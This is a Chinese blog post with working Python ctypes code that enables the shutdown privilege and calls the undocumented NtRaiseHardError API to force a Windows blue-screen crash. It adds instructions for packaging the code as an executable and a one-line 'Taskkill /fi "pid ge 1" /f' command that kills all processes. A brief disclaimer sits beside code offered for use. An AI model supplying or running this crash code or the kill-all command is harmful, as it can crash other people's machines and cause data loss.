【Python蓝屏程序(管理员)】

于 2024-08-11 11:00:00 发布
阅读量621 收藏 3
点赞数 13
分类专栏: python 网络安全 文章标签: python 开发语言 windows 运维 pygame
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45498884/article/details/140994721
版权

说明:该程序为临摹(😀)作品,源地址C++蓝屏程序(非管理员)

我试图使用Python调用 NtRaiseHardError API ,实现类似的蓝屏效果。可惜我发现Python在普通权限下,直接调用 NtRaiseHardError API 是不被允许的,因为它需要提升到系统权限才能触发蓝屏效果,即使在原文,也需要SeShutdownPrivilege才能实现蓝屏效果。

原理:

Windows的"未公开"蓝屏api:NtRaiseHardError
可以在非管理员特权下产生BSOD
调用该API需要调用者有关机权限

代码示例:

需要管理员权限

import ctypes
from ctypes import wintypes

# 定义相关的 Windows API 函数和结构体
ntdll = ctypes.WinDLL('ntdll.dll')

ULONG_PTR = ctypes.POINTER(ctypes.c_ulong)
BOOLEAN = ctypes.c_ubyte

class UNICODE_STRING(ctypes.Structure):
    _fields_ = [
        ("Length", wintypes.USHORT),
        ("MaximumLength", wintypes.USHORT),
        ("Buffer", ctypes.POINTER(wintypes.WCHAR)),
    ]

class CLIENT_ID(ctypes.Structure):
    _fields_ = [
        ("UniqueProcess", ctypes.POINTER(wintypes.HANDLE)),
        ("UniqueThread", ctypes.POINTER(wintypes.HANDLE)),
    ]

class IO_STATUS_BLOCK(ctypes.Structure):
    _fields_ = [
        ("Status", wintypes.ULONG),
        ("Information", ULONG_PTR),
    ]

# 定义函数原型
RtlAdjustPrivilege = ntdll.RtlAdjustPrivilege
RtlAdjustPrivilege.argtypes = [wintypes.ULONG, BOOLEAN, BOOLEAN, ctypes.POINTER(BOOLEAN)]
RtlAdjustPrivilege.restype = wintypes.LONG

NtRaiseHardError = ntdll.NtRaiseHardError
NtRaiseHardError.argtypes = [
    wintypes.LONG, wintypes.ULONG, wintypes.ULONG, ULONG_PTR,
    wintypes.ULONG, ctypes.POINTER(wintypes.ULONG)
]
NtRaiseHardError.restype = wintypes.LONG

# 定义一些常量和变量
STATUS_ASSERTION_FAILURE = 0xC0000420
SE_SHUTDOWN_PRIVILEGE = 19

def main():
    # 获取当前进程句柄
    current_process = ctypes.windll.kernel32.GetCurrentProcess()
    current_thread = ctypes.windll.kernel32.GetCurrentThread()

    # 启用 SE_SHUTDOWN_PRIVILEGE 权限
    privilege_enabled = BOOLEAN()
    RtlAdjustPrivilege(SE_SHUTDOWN_PRIVILEGE, True, False, ctypes.byref(privilege_enabled))

    # 调用 NtRaiseHardError 触发 BSOD
    response = wintypes.ULONG()
    NtRaiseHardError(STATUS_ASSERTION_FAILURE, 0, 0, None, 6, ctypes.byref(response))

if __name__ == '__main__':
    main()

可以在该文件夹下使用cmd输入pyinstaller -wF .\MoveMouse.py打包然后使用管理员运行

代码解析:

这段代码的目的是试图在 Windows 系统中通过调用特定的 Windows API 来触发蓝屏死机(BSOD)。

以下是对代码各部分的详细解释:

  1. 导入和定义相关类型及库:

    • import ctypes:导入 Python 的 ctypes 库,用于在 Python 中调用 Windows API 函数。
    • 定义了各种数据类型,如 ULONG_PTRBOOLEAN 等,以及结构体 UNICODE_STRINGCLIENT_IDIO_STATUS_BLOCK ,以匹配 Windows API 所需的参数和返回值的数据结构。

  2. 加载 ntdll.dll 库并定义函数原型:

    • ntdll = ctypes.WinDLL('ntdll.dll'):加载 ntdll.dll 动态链接库。
    • RtlAdjustPrivilegeNtRaiseHardError 函数定义了参数类型和返回值类型,以确保在调用时能够正确传递和处理参数。

  3. 定义常量和变量:

    • STATUS_ASSERTION_FAILURE:定义了一个表示错误状态的常量。
    • SE_SHUTDOWN_PRIVILEGE:表示特定的权限常量。

  4. main 函数:

    • 获取当前进程和线程的句柄。
    • 通过 RtlAdjustPrivilege 函数尝试启用 SE_SHUTDOWN_PRIVILEGE 权限。
    • 最后调用 NtRaiseHardError 函数,并传递特定的参数,试图触发蓝屏死机。

需要强调的是,在正常的编程和使用场景中,这样的操作是不被允许和不道德的,可能会导致系统故障、数据丢失和其他严重问题。请不要在实际使用中运行这样的代码。

补充

当然如果已经有了管理员权限,那简单两行代码也能直接蓝屏

import os
os.system("Taskkill /fi \"pid ge 1\" /f")  # Taskkill /fi "pid ge 1" /f 杀死所有进程,管理员权限cmd直接蓝屏

甚至可以直接在管理员cmd输入:

Taskkill /fi "pid ge 1" /f
Uncle 城
关注
专栏目录
[系统安全] 十五.Chrome密码保存功能渗透解析、Chrome蓝屏漏洞及音乐软件漏洞复现
杨秀璋的专栏
01-21 9939
作者前面详细介绍了熊猫烧香病毒的逆向分析过程。这篇文章换个主题继续介绍,本文将对Chrome浏览器保留密码的功能进行渗透解析;同时复现一个最近流行的漏洞,通过Chrome浏览器实现Win10蓝屏;最后介绍音乐软件的加密功能及漏洞复现。这些基础性知识不仅和系统安全相关,同样与我们身边的APP、常用软件及系统紧密联系,希望这些知识对您有所帮助,更希望大家提高安全意识,开发厂商进行相关的漏洞修补,安全保障任重道远。
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
python 调用bat失败_死机、卡顿、蓝屏Python部门的老江湖告诉我的一些超级变态代码...
weixin_39929635的博客
11-21 623
诸多行业中,程序员应该是一个比较特殊的群体,许多人一提起程序员,脑子里除了高新之外,总会不自觉的和木讷、拖沓联系在一起。而且现在的网络发达,网络中大量的黑程序员的段子,许多人根本没有接触过程序员,但看完那些段子之后,就会形成这样的印象。多数程序员并不木讷,相反我接触的同事都是很有幽默感、逻辑性强、脑子很聪明、乐于自黑。只是因工作性质的原因,他们没有多少空余时间和人谈天说地。与其闲谈不如写几行代码,...
windows蓝屏代码含意全集
他的专栏
09-04 1213
  代码       含意  0 0x00000000 作业完成。  1 0x00000001 不正确的函数。  2 0x00000002 系统找不到指定的档案。  3 0x00000003 系统找不到指定的路径。  4 0x00000004 系统无法开启档案。  5 0x00000005 拒绝存取。  6 0x00000006 无效的代码。  7 0x00000007 储存体控制区块已毁。  8
python蓝屏代码_python学习笔记 day19 常用模块(四)
weixin_39660922的博客
12-09 1135
os 模块---和操作系统相关1. os.getcwd() # 获得当前的工作目录(路径)也就是python脚本工作的目录importosprint(os.getcwd())运行结果:2.os.chdir('dirname') # 更改当前的工作目录importosprint(os.getcwd()) #得到当前的工作目录os.chdir('E:\pyhtonworkspace\py...
python蓝屏代码_死机、卡顿、蓝屏Python部分的老江湖告诉我的一些超等反常代码...
weixin_39517546的博客
12-04 1901
诸多行业中,程序员应该是一个比较特殊的群体,许多人一提起程序员,脑子里除高新之外,总会不自觉的和木讷、拖沓联系在一起。并且现在的网络发财,网络中年夜量的黑程序员的段子,许多人根本没有接触过程序员,但看完那些段子之后,就会形成这样的印象。大都程序员其实不木讷,相反我接触的同事都是很有幽默感、逻辑性强、脑子很伶俐、乐于自黑。只是因工作性质的原因,他们没有几多空余时间和人谈天说地。与其闲谈不如写几行代码...
python蓝屏_plt.绘图()导致windows出现蓝屏
weixin_39625872的博客
12-21 1007
代码导致我的计算机上的windows出现蓝屏:import matplotlib.pyplot as pltplt.plot(range(10),range(10)) # This is the line that cause the crash他告诉我:This was probably caused by the following module: nt_wrong_symbols.sys(...
python安装0x80072ee7_错误代码为 0x80072EE7 - 卡饭网
weixin_39732609的博客
11-29 2473
Win8系统无法打开应用商店且提示“服务器错误”及错误代码0x80072EE7的解决方法Win8系统无法打开应用商店且提示“服务器错误”及错误代码0x80072EE7的解决方法 win8系统应用商店无法打开,且提示“服务器出错”和错误代码0x80072EE7,具体问题现象如下所示: 解决方法: 方法一:启用Windows Update服务 1.按Win键+W打开运行: 2.在运行输入service...
[网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析(一)Python利用永恒之蓝及Win7勒索加密
杨秀璋的专栏
04-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的DC-1题目,通过信息收集、CMS漏洞搜索、Drupal漏洞利用、Metasploit反弹shell、提权及数据库爆破获取flag。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,希望这篇基础性文章对您有所帮助。
危险的10个程序及解决办法
PanDaoxi
06-02 814
危险的10个程序及解决办法
蓝屏程序 自己写着玩的
08-15
自己写的蓝屏程序,当然,是假的了,只是模仿了一下,让人信以为真吧了,蓝屏后,alt+f4,无效,就算是任务管理器也奈何不了我了,除非你强制关机。自己在写的时候,留了个小后门(不然,我自己也关不掉了),就在屏幕的右下角……
电脑蓝屏代码大全
07-30
电脑蓝屏,又叫蓝屏死机(Blue Screen of Death,简称BSOD),是微软的 Windows 系列操作系统在无法从一个系统错误中恢复过来时,为保护电脑数据文件不被破坏而强制显示的屏幕图像。 Windows操作系统的蓝屏死机提示已经成为标志性的画面。大部分是系统崩溃的现象。 Windows中有两个蓝底白字图像都被称为蓝屏死机:一种是Windows 9x操作系统发生小故障,一种是Windows NT发生内核错误。由于Windows 9x已退出历史舞台,所以现在一般指后者 在这里我们集结了大部分的电脑蓝屏代码,从而获知电脑蓝屏的原因 作者QQ3550220872
win7 蓝屏代码大全
12-13
win7 蓝屏代码大全win7 蓝屏代码大全win7 蓝屏代码大全win7 蓝屏代码大全
变态型整人代码(小心使用)适合开源
02-09
不错的开源工具!测试过。免杀版的。。合适大家
电脑蓝屏死机代码的大集合
04-04
电脑蓝屏死机代码的大集合--想知道你电脑蓝屏的原因吗?这里就可以找到答案.
python简单病毒代码
最新发布
marshmello12的博客
05-28 7791
smiley made it right=)
python3GUI--用Tk开发一款恶搞蓝屏软件(附源码)
热门推荐
懷淰メ的博客
11-29 2万+
文章目录一.准备工作1.Tkinter2.电脑蓝屏知识二.预览1.蓝屏-win10、win11(中文版)2.蓝屏-win10、win11(英文版)3.Windows其他版本(XP、Win7等)三.思路整体实现思路四.源代码blue_screen.py(主程序GUI)五.程序关闭方法方法一:方法二:方法三:六.总结 本次依然使用Tkinter进行GUI界面的开发开发一款恶搞蓝屏程序,无毒无害,仅用于恶搞,在博文后面会有关闭本程序的方法。 一.准备工作 1.Tkinter Tkinter 是 Python
蓝屏代码大全
windowsxp的部落格
05-03 8343
电脑蓝屏代码大全 0X0000000 操作完成 0X0000001 不正确的函数 0X0000002 系统找不到指定的文件 0X0000003 系统找不到指定的路径 0X0000004 系统无法打开文件 0X0000005 拒绝存取 0X0000006 无效的代码 0X0000007 内存控制模块已损坏 0X0000008 内存空间不足,无法处理这个指令 0X0000009 内
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值